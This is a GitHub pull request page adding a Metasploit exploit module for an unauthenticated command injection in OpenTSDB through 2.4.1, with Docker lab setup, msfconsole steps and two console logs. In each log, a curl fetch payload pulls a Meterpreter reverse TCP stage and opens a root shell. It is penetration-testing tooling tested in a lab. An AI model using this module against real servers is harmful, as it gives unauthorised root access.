Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add opentsdb_key_cmd_injection exploit module and docs #18350

Merged
merged 2 commits into from
Sep 8, 2023
Merged

Add opentsdb_key_cmd_injection exploit module and docs #18350

merged 2 commits into from
Sep 8, 2023

Conversation

ErikWynter
Copy link
Contributor

About

This change adds an exploit module and docs for an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 (CVE-2023-36812/CVE-2023-25826).

Vulnerable Application

OpenTSDB through 2.4.1 is affected. The module has been tested against 2.4.1.

Installation Information

Manual installation (not recommended)

For a manual installation, you can follow the official installation instructions here. This can be annoying though, so I would recommend using docker instead.

Docker installation (recommended)

For version 2.4.0, you can use the vulnhub docker image and follow the installation instructions here. That image was created for CVE-2020-35476, an older vulnerability in OpenTSDB through 2.4.0.

For any other version, you could leverage the vulhub image for OpenTSDB 2.4.0 and edit it to install the version you want. I followed this approach for 2.4.1 and it worked great.

  • First, grab the vulhub OpenTSDB 2.4.0 Dockerfile and docker-entrypoint.sh files from here and store them in a dedicated directory.
  • In the Dockerfile, replace all instances for 2.4.0 with your desired version, eg 2.4.1
  • No edits are necessary for docker-entrypoint.sh
  • Create a docker-compose.yml file with the following contents:
version: '2'
services:
 opentsdb:
   build: ./path-to-your-dockerfile-directory
   ports:
    - "4242:4242"

I used this file structure:

wynter@wynter-pc:~/dev/opentsdb$ ls -lR
.:
total 8
-rw-rw-r-- 1 wynter wynter   86 Sep  1 10:55 docker-compose.yml
drwxrwxr-x 2 wynter wynter 4096 Sep  1 10:54 docker_file

./docker_file:
total 8
-rw-rw-r-- 1 wynter wynter 927 Sep  1 10:54 Dockerfile
-rw-rw-r-- 1 wynter wynter 359 Sep  1 10:35 docker-entrypoint.sh
wynter@wynter-pc:~/dev/opentsdb$ cat docker-compose.yml 
version: '2'
services:
 opentsdb:
   build: ./docker_file
   ports:
    - "4242:4242"
  • Finally, build and run the image via docker-compose by running the below command in the directory with you docker-compose.ymlfile:
docker-compose up -d
  • After a few seconds, OpenTSDB will be available on port 4242. No additional configuration is required.

Verification Steps

Start msfconsole

  1. Do: use exploit/linux/http/opentsdb_key_cmd_injection
  2. Do: set RHOSTS [IP]
  3. Do: set LHOST [IP]
  4. Do: set SRVHOST [IP]
  5. Do: set FETCH_SRVHOST [IP]
  6. Do: exploit

Options

TARGETURI

The base path to OpenTSDB. The default value is /.

Targets

Id  Name
--  ----
0   Linux

Scenarios

OpenTSDB 2.4.1 - Linux target

msf6 exploit(linux/http/opentsdb_key_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_key_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.10.100   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      4242             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.10.100   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      Ph               no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       192.168.10.100   no        Local IP to use for serving payload
   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.10.100   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/opentsdb_key_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.10.100:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.4.1
[*] Identified 3 configured metrics. Using metric sys.cpu.nice
[*] Identified 35 configured aggregators. Using aggregator p90
[*] Executing the payload
[*] Sending stage (3045380 bytes) to 172.24.0.2
[*] Meterpreter session 1 opened (192.168.10.100:4444 -> 172.24.0.2:60346) at 2023-09-07 15:25:39 +0300

meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/share/opentsdb

@ErikWynter
Copy link
Contributor Author

Notes

  • For those interested, I have also written an exploit for this same vuln in modern Fortran (yes, you read that right). Feel free to check it out here.
  • I will add docs later
  • I ended up using a fetch payload to avoid bad character escape hell.

@github-actions
Copy link

github-actions bot commented Sep 8, 2023

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@sjanusz-r7
Copy link
Contributor

sjanusz-r7 commented Sep 8, 2023
edited
Loading

Tested with the suggested Docker container setup with OpenTSDB 2.4.1 💯 with inline run params :

msf6 exploit(linux/http/opentsdb_key_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_key_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      4242             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      yr               no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/opentsdb_key_cmd_injection) > run RHOSTS=127.0.0.1 LHOST=192.168.112.1

[*] Started reverse TCP handler on 192.168.112.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.4.1
[*] Identified 3 configured metrics. Using metric sys.cpu.idle
[*] Identified 35 configured aggregators. Using aggregator none
[*] Executing the payload
[*] Sending stage (3045380 bytes) to 192.168.112.1
[*] Meterpreter session 9 opened (192.168.112.1:4444 -> 192.168.112.1:61423) at 2023-09-08 14:32:05 +0100

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 9 closed.  Reason: User exit

I was also able to get repeated shells with no problems.

@sjanusz-r7
Copy link
Contributor

If you (@ErikWynter) are fine with it, I'll get the docs sorted now and we can get this shipped 👍

@sjanusz-r7 sjanusz-r7 merged commit 57f3b8a into rapid7:master Sep 8, 2023
32 checks passed
@sjanusz-r7 sjanusz-r7 added module docs rn-modules release notes for new or majorly enhanced modules and removed needs-docs labels Sep 8, 2023
@sjanusz-r7
Copy link
Contributor

Release Notes

Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

@ErikWynter
Copy link
Contributor Author

@sjanusz-r7 oh wow that was fast. Thanks for testing everything so quickly and for adding the docs!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@sjanusz-r7 sjanusz-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@ErikWynter @sjanusz-r7 @adfoster-r7